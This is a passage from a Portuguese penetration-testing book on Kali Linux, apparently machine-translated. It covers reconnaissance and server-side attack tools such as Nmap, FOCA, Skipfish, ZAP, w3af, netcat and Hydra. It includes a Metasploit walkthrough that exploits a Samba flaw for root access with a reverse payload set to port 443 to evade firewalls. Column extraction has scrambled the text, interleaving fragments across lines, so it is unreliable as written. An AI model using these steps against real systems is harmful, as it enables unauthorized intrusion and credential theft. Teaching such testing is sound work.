ter a permisso para fazer a varredura inferior direito determinar as coisas, como um forma comum para as pessoas a us-
antes de usar este ou opo de canto. Uma vez salvo, selecione o servidor est executando o IIS 5.0 lo.
digitalizao. Como um lembrete, Digitalizao boto no lado superior como um servidor web atravs da Alm disso, vrios lugares em GUI
completar o ACK no handshake de direito da tela porta 80. O para Zenmap permitem ao usurio
trs vias com um sistema no para iniciar a digitalizao. Observe as Resultados de pesquisa ir produzir o exportar grficos e
autorizado suas opes e alvo que voc endereo IP do servidor, o sistema certas partes do relatrio em arquivos
considerado ilegal pelos padres configurou no perfil operacional do servidor CSV ou arquivos de imagem. Essas
norte-americanos. editor so listados. execuo, bem como as aplicaes exportaes so extremamente
Podemos usar as informaes que A rede Topologia guia vai lhe dar uma web em execuo no host. Testadores valioso na criao de relatrios.
recebemos de nosso exerccio rpida olhada em como a digitalizao de penetrao vai FOCA - site metadados
Reconnaissance DNS para no alvo encontrar esses resultados valiosos Reconnaissance
visar uma srie muito especfica. rede foi concluda, e se voc tivesse quando eles esto procura de Voc sabia toda vez que voc criar um
Antes de fazer isso, vamos definir que atravessar roteadores. Neste exploits contra este host. documento, como um PowerPoint
algumas opes comuns em primeiro exemplo, voc v . Microsoft
lugar. a verificao permaneceu local para a Agora possvel para que voc possa apresentao, documento do
[62] rede. concentrar seus esforos na meta de Microsoft Word ou PDF, metadados
[63] correr web deixado no documento?
Captulo 2 servios ou a porta 80, porque [66]
Clique no Sibilo guia. Selecione o -Pn Reconhecimento aberto.
opo bandeira to Nmap no ping no O Hosts guia vai dar uma lista dos Zenmap a melhor maneira para Captulo 2
host primeiro. hosts descobertos. obter uma sada de scans do Nmap. O que so metadados? Metadados
Quando este sinalizador no estiver Quando um host selecionada, Zenmap oferece uma rica so dados sobre dados. a
definido, o Nmap ir pingar seus hosts Zenmap ir exibir uma lista detalhada interface grfica do usurio que exibe informao descritiva sobre
de destino e redes. Omisso dos Exrcitos, seu exames que podem ser exportados um determinado conjunto de dados,
definies s executar scans em hosts sistemas operacionais e servios em diferentes objeto ou de recursos, incluindo a
que so considerados vivos ou comuns. Na tela seguinte, voc pode formatos, como texto ou Microsoft forma como ele formatado, bem
acessvel. A-Pn ver um dos nossos anfitries uma Excel. como
diz ao Nmap para digitalizar um combinao DVR via satlite / [65] quando e por quem foram recolhidas.
anfitrio, mesmo sem uma resposta receptor. Os metadados podem ser teis para
de ping. Embora isto faz [64] Reconhecimento testadores de penetrao,
porque ele contm informaes sobre nas imagens seguintes:. Analisar Metadados opo, como se Reconhecimento normalmente o
o sistema em que o arquivo foi criado, [67] mostra na passo mais crtico em um exerccio de
tais como: a tela a seguir: Teste de Invaso
Reconhecimento [70] e pode ser o mais demorado.
Recomendamos manter todos os Quaisquer aes tomadas contra a
arquivos do projeto em um nico Captulo 2 meta
Nome de usurios logados no sistema lugar. Voc deveria Na tela seguinte, voc pode ver duas personalizado em torno de resultados
Software que criou o documento criar uma nova pasta para cada pessoas abriram neste documento. de reconhecimento anteriormente
OS do sistema que criou o documento projeto. Voc tambm pode determinar o realizadas. O mais
FOCA uma ferramenta de 2. Uma vez que o nome do seu projeto Microsoft Office para o Mac e Adobe dados conhecidos sobre um alvo
segurana e auditoria que ir e decidir onde voc deseja armazenar Photoshop foram equivale ao menos susceptveis de
examinar os metadados de domnios. o projeto usado para criar este documento, desencadear alarmes, bem como
Voc arquivos, clique no Criar boto, como como mostrado na imagem seguinte: melhor chance de identificar uma
pode ter FOCA usar motores de busca mostrado na imagem seguinte: [71] maneira de comprometer o alvo.
para encontrar arquivos em domnios [68] recomendado
ou usar arquivos locais. Reconhecimento olhar para este captulo como um pr-
FOCA construdo em Kali, no Captulo 2 Em muitos casos, os atacantes sero requisito para os captulos restantes
entanto, a verso datado. A melhor 3. A prxima coisa a fazer salvar o capazes de ver muito mais deste livro.
prtica baixar arquivo de projeto. Uma vez que voc informaes e reunir Neste captulo, ns nos concentramos
a verso mais recente. FOCA tem sido salvou o projeto, clique em inteligncia sobre um alvo. em vrias maneiras de coletar
tradicionalmente uma ferramenta do no Procurar Todos boto para FOCA FOCA permite ao usurio salvar e informaes sobre um alvo. Ns
Windows, ea mais recente vai usar motores de busca para ndice de uma cpia de todos os apresentou algumas ferramentas
verses podem estar disponvel procurar por metadados. Alm disso, gratuitas populares disponveis na
apenas para Windows. documentos. Opcionalmente, voc cada tipo de arquivo de metadados Internet, bem como informaes
A ltima verso do FOCA pode ser pode usar os documentos locais. podem ser salvas e copiado. Isto d Reunindo utilitrios disponveis em
baixado em: http://www.informatica64. 4. Clique com o boto direito do um verificador da penetrao Kali Linux. Neste ponto, voc deve
com.br / DownloadFOCA (Use o mouse no arquivo e selecione o Baixar uma riqueza de informaes. Imagens estar pronto para
Google Translate para ver a pgina opo, como se mostra na so normalmente utilizados para dar avaliar alvos identificados por meio de
em Ingls). tela a seguir: uma viso geral do reconhecimento para possvel
Voc precisar dar o seu endereo de [69] arquivos indexados, juntamente com explorao.
e-mail na parte inferior da tela. Voc uma lista de todos os arquivos O prximo captulo vai se concentrar
ir Reconhecimento individuais. Finalmente, foca permitir em identificar e explorar
receber um e-mail com o link de 5. Clique com o boto direito do uma vulnerabilidades em web
download. Voc tambm vai receber mouse no arquivo e selecione o Tester Penetrao baixar arquivos aplicativos e servidores web.
atualizaes quando FOCA Extrair Metadados opo, como se individuais que podem ser usados [72]
tem novos lanamentos. mostra na como exemplos.
1. A primeira coisa a fazer depois de tela a seguir: Resumo Ataques do lado do servidor
lanar FOCA criar um novo projeto, 6. Clique com o boto direito do Um servidor, por definio, um
como mostrado mouse no arquivo e selecione o sistema de computao dedicada a
execuo de servios para os gerenciar servidores remotamente e vetores. um servidor com um nomes de domnio hospedado em
usurios e no monitorar ativamente a atividade, sistema operacional e executando uma mquina de destino, bem como
outros computadores em uma rede. ou seja, pequenas batidas vrias peas de de difuso usando dinamicamente
Exemplos de faixa de servio a partir em desempenho ou outros software para fornecer funcionalidade nomes de arquivos gerados. Webshag
de servios pblicos, tais indicadores de que est sendo web. Ele tem muitas portas TCP pode realizar impresses digitais de
jogos on-line como a partilha de comprometida pode passar abertas. Cada um de pginas da web ao mesmo tempo que
arquivos confidenciais dentro de uma despercebida. esses vetores poderia colher uma resistente a alteraes de contedo.
grande organizao. No contexto comum encontrar usurios mal- vulnerabilidade que um invasor pode Este recurso foi projetado como uma
da arquitetura cliente-servidor, um intencionados j acessou servidores explorar para entrar remoo de falsos positivos
servidores um programa de comprometidos por longos perodos o sistema e obter informao valiosa. algoritmo destinado a lidar com "soft
computador que est executando para de tempo antes de os proprietrios Muitos protocolos em servidores so 404" respostas do servidor.
servir que identificam a vulnerabilidade tratados Webshag acessado atravs de uma
os pedidos de outros programas, usada para acessar o sistema. atravs de texto no criptografado interface grfica ou um console de
conhecidos como os "clientes". Assim, Este captulo se concentrar na legvel. linha de comando e disponvel com
o servidor executa identificao e explorao de Vamos dar uma olhada em algumas as plataformas Linux e Windows.
alguma tarefa computacional em vulnerabilidades em web ferramentas disponveis no Kali para Webshag pode ser encontrado em
nome de "clientes". Os clientes ou servidores de aplicativos. Vamos identificar vulnerabilidades Aplicaes Web
executados no mesmo comear com apresentando em servidores. |Scanners de Vulnerabilidade Web
computador ou ligue atravs da rede. ferramentas disponveis no Kali Webshag como webshag-gui.
Por exemplo, um servidor que usados Webshag uma ferramenta multi- Webshag fcil de utilizar. Cada
hospedar um jogo para identificar vulnerabilidades. Em threaded, multi-plataforma utilizada recurso tem uma aba na parte
para o mundo enquanto os clientes seguida, vamos nos concentrar na para auditar servidores web. superior. Selecione o recurso
poderiam acessar o jogo explorao de vulnerabilidades para Webshag rene funcionalidades desejado
remotamente. Existem vrias formas ganhar geralmente teis para servidores web, guia, insira em seu URL de destino
de prestao de servios aos clientes, acesso a servidores de aplicativos como o porto sob o espao de destino e clique em
tais como um servidor Web Apache web. Concluiremos com outros digitalizao, digitalizao e arquivo Ok para executar. Voc
HTTP ou limitada a um mtodos de acesso de URL difuso. Ele pode ser usado pode executar vrias abas
Servidor de Aplicativos BEA WebLogic servios de aplicativos web. para fazer a varredura de um servidor simultaneamente. As caractersticas
que faz HTTP e mais. web em incluem Porto de digitalizao,
Servidores de rede so normalmente Ataques do lado do servidor HTTP ou HTTPS, atravs de um proxy Aranha, URL
configurados para lidar com a carga A avaliao da vulnerabilidade e usando a autenticao HTTP Digitalizar e Fuzzing. Os prximos
de atender grande Ataques do lado do servidor esto (bsica ou Digest). quatro imagens mostram Webshag
volumes de clientes. Isso significa que explorando e encontrar Alm disso, Webshag pode usar realizando uma varredura de portas,
a adio de processamento, memria vulnerabilidades em servios, portos, recursos de evaso de IDS que visam rastreamento de aranha web,
adicional e e aplicaes rodando em um servidor. tornar correlao varredura URL e arquivo de Fuzz
armazenamento tornando esses ativos Por exemplo, um servidor web tem entre os pedidos mais complicado. www.thesecurityblogger.com:
valiosos alvos para hackers. vrios ataque Webshag oferece capacidades [74]
Organizaes tipicamente inovadoras adicionais, tais como
recuperar a lista de Captulo 3
[75] Skipfish pode ser encontrado em no ambiente de trabalho. Isto o processo. Voc pode terminar uma
Aplicaes Web |Scanners de executado usando a palavra-chave varredura cedo digitando Ctrl +C.
Ataques do lado do servidor Vulnerabilidade Web como skipfish,-O / root / Desktop / Uma vez que a verificao for
[76] skipfish. Quando voc abre Skipfish, Skipfishoutput para especificar o local concluda ou se voc termin-la cedo,
um Terminal janela pop-up mostrando para o qual enviar a sada, -W / root / Skipfish ir gerar uma tonelada de
Captulo 3 comanda o Skipfish. Skipfish pode Desktop / complete.wl para especificar sada
Webshag oferece exportar todos os usar dicionrios internos ou a localizao do dicionrio e http:// arquivos no local especificado quando
dados encontrados durante uma personalizveis para www.thesecuirtyblogger.com como o se utiliza o -O opo de designar uma
auditoria no XML, HTML e avaliao de vulnerabilidade. alvo para fazer a varredura contra. pasta de sada.
Formatos de arquivo TXT. O relatrio Note-se que alguns dicionrios no [78] Para ver os resultados, clique no
final da Webshag organizado em um pode ser encontrada em Kali. Voc index.html arquivo, o que far com
formato lgico tornando-se pode Captulo 3 que uma Internet
digno de ser usado como um baixar a ltima verso do Skipfish e Note-se que o padro skipfish navegador. Voc pode clicar nas
documento independente ou artigo de padro dicionrios dicionrios no ser executado caixas drop-down para ver os
referncia para um teste de a partir de quando se utiliza o resultados. Veja o
penetrao https://code.google.com/p/skipfish/. -W comando. Voc pode copiar uma exemplo relata seo para obter mais
relatrio de entrega. As duas prximas Os dicionrios disponveis esto lista de palavras padro e remover o informaes.
imagens mostram exportadores localizados no dicionrio arquivo. read-only [80]
opes e ao topo de uma Existem vrias opes de comando na primeira linha da lista (# ro) para
relatrio de auditoria: disponveis em Skipfish. Para executar ser executado como uma lista de Captulo 3
Mais informaes sobre Webshag Skipfish contra um palavras personalizada. Isto ProxyStrike um proxy de aplicao
pode ser encontrada em alvo site usando uma lista de palavras mostrado web construda para identificar as
http://www.scrt.ch/en/attack/download personalizada, insira skipfish, na imagem seguinte: vulnerabilidades enquanto navega
s/webshag. Selecione sua lista de palavras Se no houver erros de compilao, um aplicativo. Ele funciona como um
[77] usando voc ser presenteado com uma tela proxy na porta de escuta 8008 por
o -W opo seguida pela localizao de lanamento que padro, o que significa que
Ataques do lado do servidor da lista de palavras, selecione o estados a digitalizao comear em tem que configurar o seu navegador
Skipfish diretrio de sada 60 segundos ou ao pressionar de Internet para ser executado atravs
Skipfish uma ferramenta de utilizao -O seguido do local, e, qualquer tecla. ProxyStrike para que ele possa
reconhecimento de segurana de finalmente, o stio alvo. [79] analisar todos os parmetros em
aplicativos web. Skipfish prepara um Skipfish-o (local de sada)-W segundo plano enquanto o surfe site
mapa do site interativo para o alvo (localizao da lista de palavras) (site Ataques do lado do servidor do alvo.
usando rastreamento recursivo e destino) Voc pode pressionar a Barra de As caractersticas de proxy so timos
sondas base de dicionrio. O exemplo a seguir mostra uma espao para ver os detalhes sobre a para identificar, interceptar e modificar
O mapa resultante fornece sada aps varredura usando uma lista de pesquisa ou ver os nmeros padro pedidos.
ser escaneado por verificaes de palavras chamada complete.wl em executar. Digitalizar um alvo pode Para configurar um navegador de
segurana. securityblogger.com. Skipfish ir criar levar de 30 segundos a algumas horas Internet, como o Firefox para usar
uma pasta chamada Skipfishoutput para completar ProxyStrike, selecione em FireFox
Preferncias |Avanado |Rede e http://, Verifique o rastreamento Vega [86]
selecione Configuraes. Selecionar usando a caixa de plugins e clique no Vega uma ferramenta de teste de
Proxy manual e grande Pare boto segurana utilizado para indexar um Captulo 3
digite o endereo IP do seu servidor mud-lo para Em execuo. site e analisar o contedo da pgina As duas imagens seguintes oferecer a
de Kali seguido pelo porto de 8008 (A Adicionando os plugins ir aumentar o para possibilidade de adicionar os cookies
menos que voc est pensando tempo para completar uma encontrar as ligaes, bem como e os padres de excluso
para alterar a porta padro digitalizar. ProxyStrike exibir uma parmetros de formulrio. para evitar a difuso, que so ambos
ProxyStrike). barra de status fornecendo uma Para iniciar Vega, ir para Aplicaes opcional. Voc pode deixar os
ProxyStrike estimativa de quanto tempo uma Web |Scanners de Vulnerabilidade padres e clique em
[81] varredura Web e selecione Prximo para ambas as telas. Clique
deve tomar. Vega. Vega vai piscar um banner de em Acabamento para iniciar a
Ataques do lado do servidor [82] introduo e exibir uma GUI. digitalizao.
Para usar ProxyStrike, acesse [85] Vega vai exibir as pesquisar e mapear
Aplicaes Web |Scanners de Captulo 3 as vulnerabilidades ativos encontrados
Vulnerabilidade Web e [83] Ataques do lado do servidor para o nvel de risco
selecionar ProxyStrike. Assumindo Vega tem Scanner e Procurao guias que representam para o sistema de
que o seu navegador de Internet est Ataques do lado do servidor no canto superior direito. Para usar destino.
enviando trfego para ProxyStrike, O Plugins guia mostra os resultados Vega como um scanner, A janela superior esquerda intitulado
voc deve ver o trfego capturado no de um rastreamento aps uma clique no Scanner aba no canto Ver Website exibe o alvo (s) que est
Comms guia. Vamos passar mais varredura lanado. Ataques superior direito, clique em sendo digitalizado
tempo usando identificados podem ser exportados Digitalizao no canto superior e outros alvos associados com o alvo
Proxies em Captulo 6, ataques web. via HTML ou XML. esquerdo, principal. A parte inferior da janela
As caractersticas de esteira so uma O Log guia mostra quais as tarefas e selecione para comear a nova esquerda
maneira fcil de digitalizar um site alvo que esto sendo executadas em site verificao. intitulado Digitalizar Alertas mostra as
para SQL ou SSL e de destino eo nvel Voc ver um campo de entrada categorias de vulnerabilidades
Vulnerabilidades XSS do plugin. Voc de sucesso para cada ataque. Este pedindo o alvo. O exemplo a seguir encontradas. Voc pode clicar
no tem que ter ProxyStrike arquivo pode ser copiado para um alvo sobre os acentos circunflexos ao lado
configurado como um proxy para arquivo de texto para um produto final. www.thesecurityblogger.com. Escolha dos alertas para ver o que
usar os recursos de esteira. Para O Crawler guia lista todos os links da o seu destino e clique em Em seguida: vulnerabilidades Vega encontra.
executar a funo de rastreador em web nicos identificados associados a As prximas sees so opes que Quando voc
um site com plugins XSS, um alvo. voc pode avaliar o seu alvo contra. clicar em qualquer vulnerabilidade,
clique no Plugins guia, v at as velas ProxyStrike oferece outros recursos Existem dois principais Vega apresenta uma definio do que
de XSS e selecione para ativar os teis. Mais sobre ProxyStrike pode ser mdulos (injeo e Processamento encontrado com um
plugins encontrada em Response) com muitas opes para explicao detalhada de seu possvel
usando a caixa de seleo. Em http://www.edge- fazer a varredura contra. impacto.
seguida, selecione a guia rastreador. security.com/proxystrike.php. Clique na pequena cenoura em cada [87]
Entre no site da meta, incluindo [84] mdulo, selecione as opes que voc
deseja procurar, Ataques do lado do servidor
Captulo 3 e clique em Avanar.
A figura a seguir mostra uma possvel que usam HTTPS. Para gerar um , indo para Editar, Preferncias, links associados com o alvo, bem
vulnerabilidade de script cross-site em certificado SSL, clique no Gerar boto. selecionar o Avanado guia e, em como varredura em busca de
www.thesecurityblogger.com: [89] seguida, selecionando o vulnerabilidades. Para ver o
Vega do Procurao seo fornece a Rede guia. Clique no Configurar vulnerabilidades, clique no Alertas
capacidade de ver os pedidos e Ataques do lado do servidor boto, clique em Configurao manual guia.
respostas Haver uma janela que aparece de proxy, Note-se que Zaproxy no automatizar
um site de destino. O Procurao pedindo para gerar ou importar um tipo localhost e porta 8080, Que o a autenticao por padro. Tudo o
seo ser preenchida como ocorre certificado. Voc padro para Zaproxy. Clique no login
uma varredura. pode gerar um certificado clicando em caixa ao lado Use este servidor proxy solicitaes falhar usando uma
[88] Gerar. Voc pode salvar o novo para todos os protocolos e clique em varredura automtica se as
certificado OK. O configuraes padro esto
Captulo 3 clicando no Salvar e selecionar onde tela a seguir demonstra essa habilitados.
Vega oferece detalhes sobre voc deseja coloc-lo. O novo arquivo configurao: [92]
vulnerabilidades encontradas no visor de certificado Abra Zaproxy e voc deve ver uma
central, bem chamado owasp_cap_root_ca.cer. Sites janela no lado superior Captulo 3
como uma pgina de resumo. Esses Uma vez que voc salvou o arquivo de esquerdo. Esta vontade Voc pode configurar o login
detalhes podem ser copiados para um CA, clique em Ok e abrir o seu preencher como voc navegar na automtico usando Zaproxy, no
resultado final. navegador. Para o Firefox, Internet usando o Firefox. Voc pode entanto, voc ter que primeiro
OWASP-Zap falir Editar |Preferncias e clique no ver todos os pedidos e registrar manualmente em um site
OWASP-Zap tambm conhecido como Avanar guia. Clique no Criptografia respostas para cada pgina na janela enquanto Zaproxy est habilitado, diga
Zaproxy um proxy interceptar sub-aba e clique em Exibir da direita. Zaproxy d uma viso fcil Zaproxy onde o
projetado para a segurana certificados. Em seguida clique em de todos login e logoff so pedidos e habilitar o
testes de aplicaes web. Importao e selecione o certificado os recursos que esto sendo recurso de auto-login. O GET
Abrir Zaproxy, indo para Aplicaes voc gerada em Zaproxy (o . Cer utilizados por cada pgina. solicitaes
Web |Aplicaes Web fuzzers e arquivo). Firefox ir perguntar em [91] ser exibido na Sites janela e voc
selecionando owasp-zap. Haver um quem confiar com o deve destacar tanto o login e de logout
aviso pop-up que deve ser aceito para novo Autoridade de Certificao. Ataques do lado do servidor respostas sob a Respostas guia
comear Confira todas as trs opes, que so Voc tambm pode fazer uma clicando com o boto direito sobre a
o programa. sites de confiana, e-mail avaliao especfica de um site, indo resposta, ao clicar em
Ao aceitar o aviso de licena, desenvolvedores de usurios, e para o incio rpido Assinalar como contedo e selecionar
OWASP-Zap vai abrir e exibir outro software. Clique em Ok duas vezes. janela e digitando em um site na URL se a de login ou logout.
pop- [90] para atacar espao. A sequncia Um cone com uma linha marrom
perguntando se voc gostaria de criar Screenshot Zaproxy executar uma aparecer na barra de ferramentas
um certificado SSL da CA raiz. Isto Captulo 3 verificao de representando automtico
permite Zaproxy O prximo passo configurar o www.thesecurityblogger.com: autenticao. Clique sobre esse cone
para interceptar o trfego HTTPS Firefox para procurao todo o trfego Zaproxy ir realizar um rastreamento para ativar a autenticao automtica
sobre SSL em um navegador. Isto atravs Zaproxy. Faa isso de aranha do site da meta identificar de modo que
importante para aplicaes de teste todas as
Zaproxy pode logar automaticamente Tipo USO seguido do mdulo que ataques. considerada uma das msfgui (Baseado em GUI) e msfcli
em qualquer pedido de autenticao voc deseja e preencha os requisitos ferramentas mais teis para (Linha base de comando).
ao fazer uma para executar. testadores de penetrao. HD Moore Em adio aos comandos Metasploit,
avaliao automtica de um alvo. Este Por exemplo, para executar o criado em 2003. Ele usado como msfconsole permitir que voc invocar
recurso til para auto-explorar um Webkiller mdulo, tipo usar a rede / uma ferramenta de teste de comandos do sistema operacional
site Webkiller e encher penetrao legtimo, bem como uma subjacente, como sibilo ou nmap. Isso
que requer autenticao. no alvo para atacar o uso set TARGET ferramenta til porque
[93] comandos. Tipo RUN para executar o utilizado por atacantes para realizar a permite a um invasor executar tarefas
mdulo. explorao no autorizada de rotineiras sem sair do console.
Ataques do lado do servidor [95] sistemas. Em nosso primeiro passo, vamos usar
Zaproxy tem um lugar de mercado H uma abundncia de fontes nmap para fazer a varredura da rede
encontrado em Ajudar |Verificar Ataques do lado do servidor dedicado a ensinar como usar o local. Os resultados podem
atualizaes que oferece outra Explorao Metasploit ser automaticamente adicionado no
caractersticas, que podem ser Se um verificador da penetrao quadro. No contexto deste livro, Metasploit usando um arquivo XML.
adicionados ao arsenal Zaproxy. investe tempo e recursos adequada vamos examinar como Metasploit [96]
Zaproxy oferece diferentes opes de durante o usado
relatrios encontrados sob a Relatrio Reconhecimento de um alvo, o para a explorao do lado do servidor Captulo 3
guia. verificador da penetrao deve acabar para testar aplicaes web em O comando que emitimos :
Aqui esto exemplos de um relatrio com uma lista de alvos potencial. my.xml rede nmap-n-oX
HTML para com possveis vulnerabilidades. O Nota para certificar-se de Postgres Vamos importar os nossos resultados
www.thesecurityblogger.com. prximo passo priorizar o valor de SQL e servios Metasploit so de nmap em Metasploit usando o
[94] cada alvo para o seu iniciados. arquivo XML que criamos.
misso, aproximando o nvel de Voc pode faz-lo digitando postgres Fazemos isso atravs do comando:
Captulo 3 esforo necessrio para explorar servio comear e servio db_import my.xml
Websploit possveis vulnerabilidades, incio Metasploit no Terminal janela Uma verificao rpida dos comandos
Websploit um projeto de cdigo e julgar o risco associado com a como root. do host mostra que a nossa
aberto usado para digitalizar e analisar realizao do ataque. A O primeiro passo abrir um console e importao bem sucedida e
sistemas remotos vulnerabilidade e digitar msfconsole para lanar Metasploit tem agora a nmap dados.
encontrar vulnerabilidades. explorao disponvel em Kali so Metsaploit. Ns tambm ir emitir o servios
Para acessar Websploit, ir ao abrigo ideais para a identificao e msfconsole a forma mais popular comando para ver os servios
Aplicaes Web |Aplicaes Web explorao de vulnerabilidades para lanar Metasploit. Ele fornece um disponveis dentro
fuzzers e encontrados durante o usurio Metasploit. O seguinte um exemplo
selecionar websploit. ATerminal janela reconhecimento de servidores de interface para acessar o quadro de sada do servio comando:
pop-up com o Websploit bandeira. aplicativos web. Metasploit inteiro. Comandos bsicos, [97]
Voc Metasploit como
pode ver todos os mdulos O Metasploit quadro uma das ajudar e exposio permitir que voc Ataques do lado do servidor
disponveis eo que necessrio para ferramentas mais populares para a navegue atravs Metasploit. Voc pode realizar a digitalizao para
executar um mdulo especfico por explorao do lado do servidor Note-se que existem outros mtodos nmap e importar o arquivo XML para o
datilografia Mostrar mdulos. para lanar Metasploit como Metasploit
banco de dados em uma nica etapa Captulo 3 [100] Ataques do lado do servidor
usando o comando db_nmap. No Para usar um especfico explorar, Quando terminar de configurar as
exemplo a seguir, ns emitimos o usar comando. Neste Captulo 3 nossas opes, podemos escrever,
est usando db_nmap para digitalizar caso: Uma vez que a carga definido, explorar para executar o ataque.
um host usando o nmap comandos. Uma vez que um exploit podemos emitir o mostrar opes Quando
Podemos verificar que Metasploit tem selecionado, preciso ver que comando novamente para verificar a o exploit executado com xito, voc
a informao relevante na sua informao necessria antes de opes especficas para a carga til. ser conectado ao servidor remoto.
emisso de banco de dados podemos executar o selecionado Podemos ver isso de carga especfico Voc pode
o hospedeiros e servios comandos. explorar. Fazemos isso atravs da est nos pedindo para definir o executar qualquer comando e, neste
O servios comando revela que identificao do requerido LHOST e a LPORT. O exemplo, neste particular explorar d
estamos usando o compartilhamento opes listadas na sada e selecionar LHOST o host local ou sua caixa acesso root. Raiz
de arquivos Samba. Vamos ver se uma carga til que queremos entregar. atacante Metasploit. A explorao faz acesso significa acesso completo ao
podemos Ns o controle remoto seu servidor remoto alvo.
procurar um exploit e tirar proveito emitir o comando mostrar opes para sediar ligar de volta para o sistema de Existem vrios exploram e carga
disso. importante notar que, embora ver as opes necessrias: hospedagem Metasploit, por isso o opes disponveis no quadro
estamos atacando um servidor web [99] host remoto precisa Metasploit.
real, neste caso, no precisa sabe o que o seu endereo de IP . Certifique-se de rever as opes
necessariamente tentar Ataques do lado do servidor Alm disso, preciso definir a porta disponveis no
para explorar uma vulnerabilidade Podemos ver esse exemplo que do host remoto ir usar para se http://www.metasploit.com/.
web. Atacantes reais vai aproveitar precisamos de uma RHOST entrada. comunicar com w3af
todo o software RHOST o endereo IP Metasploit. Muitos ambientes w3af (Abreviao de Aplicaes Web
rodando em um servidor web para do host remoto que esto atacando. corporativos restringir portas de sada Attack e Quadro de Auditoria) um
acessar informaes. Ns tambm precisamos selecionar a atravs de um firewall open-source
Vemos vrios exploits Samba carga e definir o ou roteador. A melhor prtica usar scanner de segurana de aplicaes
disponvel. Eles tambm tm rankings. opes de carga til. A carga til o uma porta comum, como porta 443, web e ferramenta de explorao. W3af
Usaremos cdigo que injeta em si e executa o Uma vez que geralmente pode ser acessado em
o usermap_script explorar com uma exploit. Desde reservados para o trfego SSL, que a Avaliao de Aplicaes Web
excelente classificao. Este mdulo a mesma vulnerabilidade pode existir maioria das empresas permitem |Scanners de Vulnerabilidade Web
explora o usando vrios mtodos, podemos sada. Alm disso, outra seleccionando w3af.
vulnerabilidade de execuo de eventualmente ter benefcio do uso de porta 443 que a [102]
comando em verses de Samba vrias cargas teis para escolher. maioria das organizaes no
3.0.20 atravs 3.0.25rc3. Para ver as cargas disponveis, emita inspecionar SSL. Ns achamos que Captulo 3
Mais informaes sobre este exploit o exposio utilizao 443 como LPORT para a w3af oferece um assistente, no
pode ser encontrada em payloads comando. maioria dos ataques nos permite entanto, no necessrio para
http://www.metasploit.com/ Uma vez que vemos uma carga que ignorar ferramentas de proxy interno executar corretamente uma varredura.
modules / exploit / multi / samba / queremos usar, o prximo passo um O primeiro
usermap_script. usar a definir payload organizao pode ter implantado. passo ou est a criar um novo perfil ou
[98] comando e colocar no nome do patch [101] aproveitando um perfil existente. Os
da carga que vemos. perfis so utilizados
para plugins de grupo que ser Para ver os resultados de uma enviar informaes confidenciais por host o servidor SMTP. A tela a
executado em um alvo. w3af vem com varredura, clique no Resultados guia. e-mail. Na maioria dos ambientes, os seguir est sendo executado Feroz
algum grande defeito Resultados proporcionar o servidores de e-mail manter em
grupos como OWASP TOP10. foram identificados os detalhes do que informaes valiosas tornando-se um www.cloudcentrics.com:
Definies de plugins existentes sero possvel vulnerabilidades. O Explorar alvo de alta prioridade para os Primeiro, precisamos ver se o servidor
exibidas em guia vai mostrar atacantes. A boa de correio eletrnico vulnervel a
A janela Centro de como voc as possveis exploits baseados nas notcia para os consumidores que os comandos diretos. A principal
selecion-los, como o exemplo a vulnerabilidades descobertas. sistemas de e-mail configuradas finalidade para a qual a maioria dos
seguir do OWASP [104] corretamente modernos so atacantes querem explorar servidores
Perfil TOP10. Voc pode selecionar extremamente de correio para falsificar e-mails
um perfil existente ou o novo perfil que Captulo 3 difcil de explorar. Isso no significa e utilizar o servidor de e-mail como um
voc acabou de w3af permite aos usurios explorar que os sistemas de e-mail no so servidor de retransmisso de e-mail
criado na coluna da esquerda. Se vulnerabilidades identificadas durante vulnerveis a ataques no autorizado. Este livro vai
voc estiver usando um novo perfil ou a fase de auditoria. Como pois a maioria dos sistemas de e-mail cobrir mais sobre como comprometida
editar um j existente vulnerabilidades so encontrados, tm aplicaes web e so acessadas e-mail servidores podem ser usados
perfil, voc pode marcar a caixa para eles so armazenados em locais atravs de um web para a engenharia social
qualquer plugins que deseja verificar. especficos da base de conhecimento, interface. Isto promove a possibilidade ataques em Captulo 4, os ataques do
Quanto mais plugins a partir da qual explorar plugins de um intruso acesso remoto a um lado do cliente.
voc verificar, quanto mais tempo a podem ler e usar essa informao ncleo Neste exemplo, usaremos Netcat
digitalizao vai demorar. w3af ir para explorar o sistema que poderia ser aproveitado como a ferramenta para se conectar
avis-lo de possveis atrasos vulnerabilidade. Se a explorao for como um ponto a outros sistemas ao servidor de correio. Netcat
se voc verificar um grande grupo. bem sucedido, voc vai ter um shell internos. um servio de redes de computadores
Clique em Comeo para executar a no sistema de destino. O [105] para leitura e gravao para
verificao. imagem seguinte mostra www.ntew3af Conexes de rede
Em seguida, digite a URL de destino explorando a dayShell vulnerabilidade Ataques do lado do servidor usando TCP ou UDP. Netcat
no Target: campo e clique em Comeo em Antes de atingir os servidores de projetado para ser um dispositivo
para executar a verificao. O www.thesecurityblogger.com. correio, importante saber o que os confivel "back-end", que
seguinte imagem mostra criao de H um monte mais recursos teis no sistemas esto hospedando o pode ser usado diretamente ou
w3af para escanear conjunto de ferramentas w3af. Voc servidores de correio. Se voc no facilmente conduzida por outros
www.thesecurityblogger.com: pode aprender mais em tiver essa informao, voc pode usar programas e scripts. Netcat tambm
[103] http://w3af.org/. o Reconhecimento uma depurao e investigao
Explorando os sistemas de e-mail tcnicas que aprendemos em Captulo ferramenta de rede rica em recursos
Ataques do lado do servidor Por natureza, todos os sistemas de e- 2, de reconhecimento. Neste exemplo, com a capacidade de produzir
w3af mostrar o status de uma mail sentar na Internet e permitem foi utilizado quase qualquer tipo de correlao
varredura ativa no Log janela. w3af externo annimo feroz para determinar os hosts MX usando um nmero de capacidades
tentar acesso do mundo exterior, a fim de para um domnio particular. Na embutidas.
predizer o perodo de tempo ser produtivo. Usurios em muitas maioria dos casos, o MX Um mtodo comum para lanar Netcat
necessrio para completar a anlise. organizaes est emitindo o comando netcat
correio-servidor
port. Neste exemplo, o nosso alvo A lista completa dos comandos SMTP mtodo de ataque para testar contra e HTTPS GET e POST informaes.
servidor de correio est em execuo podem ser encontrados atravs dos uma variedade de protocolos Esta informao til ao usar
servidores pela porta 25. Ns comandos SMTP RFC diferentes. ideal para atacar ferramentas
verificado esta informao usando ou usando o Google. sistemas de e-mail porque Hydra pode tais como Hydra fora-bruta
nmap durante os passos de Ataques de fora bruta direcionar um IP e protocolo formulrios da web, pois voc pode
reconhecimento descrito Um ataque de fora bruta quando especfico, como o administrador automatizar Hydra na abertura
em Captulo 2, de reconhecimento. todas as chaves possveis so conta para POP3 e SMTP utilizado a pgina da Web e testar as diferentes
Uma vez que se conectar ao servidor verificadas em relao aos dados pelos sistemas de e-mail. combinaes de nome de usurio e
